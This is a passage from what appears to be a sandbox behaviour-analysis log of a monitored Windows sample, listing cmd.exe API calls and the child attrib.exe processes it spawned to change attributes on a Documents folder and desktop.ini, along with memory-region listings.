lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, 
lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.044] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile 
(in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.045] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.074] _close (_FileHandle=4) returned 0 [0130.074] FindNextFileW (in: hFindFile=0x37e5e8, lpFindFileData=0x26ed00 | out: lpFindFileData=0x26ed00) returned 0 [0130.074] GetLastError () returned 0x12 [0130.074] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.074] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0130.076] _close (_FileHandle=3) returned 0 [0130.077] GetConsoleTitleW (in: lpConsoleTitle=0x26f138, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.077] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.077] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.077] GetLastError () returned 0x2 [0130.077] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.077] GetLastError () returned 0x2 [0130.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0x37e5e8 [0130.078] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.078] GetLastError () returned 0x2 [0130.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0x37e5e8 [0130.078] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.078] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.078] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.078] GetConsoleTitleW (in: lpConsoleTitle=0x26eecc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.078] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ed54, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ee1c | out: lpAttributeList=0x26ed54, lpSize=0x26ee1c) returned 1 [0130.078] UpdateProcThreadAttribute (in: lpAttributeList=0x26ed54, dwFlags=0x0, Attribute=0x60001, lpValue=0x26ee14, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ed54, lpPreviousValue=0x0) returned 1 [0130.078] GetStartupInfoW (in: lpStartupInfo=0x26ed10 | out: lpStartupInfo=0x26ed10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0130.078] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.078] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26edb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26edfc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", lpProcessInformation=0x26edfc*(hProcess=0x4c, hThread=0x50, dwProcessId=0x5fc, dwThreadId=0xc4)) returned 1 [0130.082] CloseHandle (hObject=0x50) returned 1 [0130.082] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.082] GetEnvironmentStringsW () returned 0x382c70* [0130.082] FreeEnvironmentStringsW (penv=0x382c70) returned 1 [0130.082] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0130.160] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26ecf0 | out: lpExitCode=0x26ecf0*=0x0) returned 1 [0130.160] CloseHandle (hObject=0x4c) returned 1 [0130.160] _vsnwprintf (in: _Buffer=0x26ee38, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ecfc | out: _Buffer="00000000") returned 8 [0130.160] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0130.160] 
GetEnvironmentStringsW () returned 0x382c70* [0130.160] FreeEnvironmentStringsW (penv=0x382c70) returned 1 [0130.160] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.160] GetEnvironmentStringsW () returned 0x382c70* [0130.160] FreeEnvironmentStringsW (penv=0x382c70) returned 1 [0130.161] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ed54 | out: lpAttributeList=0x26ed54) [0130.161] GetConsoleTitleW (in: lpConsoleTitle=0x26f138, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.161] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.161] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.161] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.161] GetLastError () returned 0x2 [0130.161] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.161] GetLastError () returned 0x2 [0130.161] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0x37e5e8 [0130.161] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.162] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, 
lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0xffffffff [0130.162] GetLastError () returned 0x2 [0130.162] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26e9d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e9d4) returned 0x37e5e8 [0130.162] FindClose (in: hFindFile=0x37e5e8 | out: hFindFile=0x37e5e8) returned 1 [0130.162] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.162] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.162] GetConsoleTitleW (in: lpConsoleTitle=0x26eecc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.162] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ed54, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26ee1c | out: lpAttributeList=0x26ed54, lpSize=0x26ee1c) returned 1 [0130.162] UpdateProcThreadAttribute (in: lpAttributeList=0x26ed54, dwFlags=0x0, Attribute=0x60001, lpValue=0x26ee14, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ed54, lpPreviousValue=0x0) returned 1 [0130.162] GetStartupInfoW (in: lpStartupInfo=0x26ed10 | out: lpStartupInfo=0x26ed10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0130.162] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.162] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", 
lpStartupInfo=0x26edb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26edfc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", lpProcessInformation=0x26edfc*(hProcess=0x50, hThread=0x4c, dwProcessId=0x46c, dwThreadId=0x4b0)) returned 1 [0130.164] CloseHandle (hObject=0x4c) returned 1 [0130.164] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.164] GetEnvironmentStringsW () returned 0x383628* [0130.164] FreeEnvironmentStringsW (penv=0x383628) returned 1 [0130.164] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0130.369] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26ecf0 | out: lpExitCode=0x26ecf0*=0x0) returned 1 [0130.369] CloseHandle (hObject=0x50) returned 1 [0130.369] _vsnwprintf (in: _Buffer=0x26ee38, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ecfc | out: _Buffer="00000000") returned 8 [0130.369] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0130.369] GetEnvironmentStringsW () returned 0x383628* [0130.370] FreeEnvironmentStringsW (penv=0x383628) returned 1 [0130.370] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.370] GetEnvironmentStringsW () returned 0x383628* [0130.370] FreeEnvironmentStringsW (penv=0x383628) returned 1 [0130.370] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ed54 | out: lpAttributeList=0x26ed54) [0130.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.370] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0130.370] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.370] SetConsoleInputExeNameW () returned 0x1 [0130.370] GetConsoleOutputCP () returned 0x1b5 [0130.371] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.371] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.371] exit (_Code=0) Process: id = "95" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0x8d4" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11263 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11264 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11265 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11266 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 11267 start_va = 0xd30000 end_va = 0xd36fff entry_point = 0xd30000 region_type = mapped_file name = "attrib.exe" filename = 
"\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11268 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11269 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11270 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11271 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 11272 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11273 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11274 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11275 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11276 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 11277 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11278 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = 
"\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11279 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11280 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11281 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11282 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11283 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11284 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11285 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11286 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11287 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 
region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11288 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11289 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11290 start_va = 0x150000 end_va = 0x217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 11291 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11292 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 152 os_tid = 0x140 Process: id = "96" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16380" os_pid = "0x5fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0x8d4" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11370 start_va = 0x10000 
end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11371 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11372 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11373 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 11374 start_va = 0x880000 end_va = 0x886fff entry_point = 0x880000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11375 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11376 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 